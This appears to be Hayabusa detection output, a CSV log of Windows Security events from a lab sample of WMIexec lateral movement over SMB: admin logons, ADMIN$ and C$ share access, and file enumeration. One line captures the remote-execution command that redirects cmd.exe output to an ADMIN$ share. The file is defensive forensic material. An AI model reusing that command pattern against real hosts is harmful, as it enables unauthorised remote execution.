+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
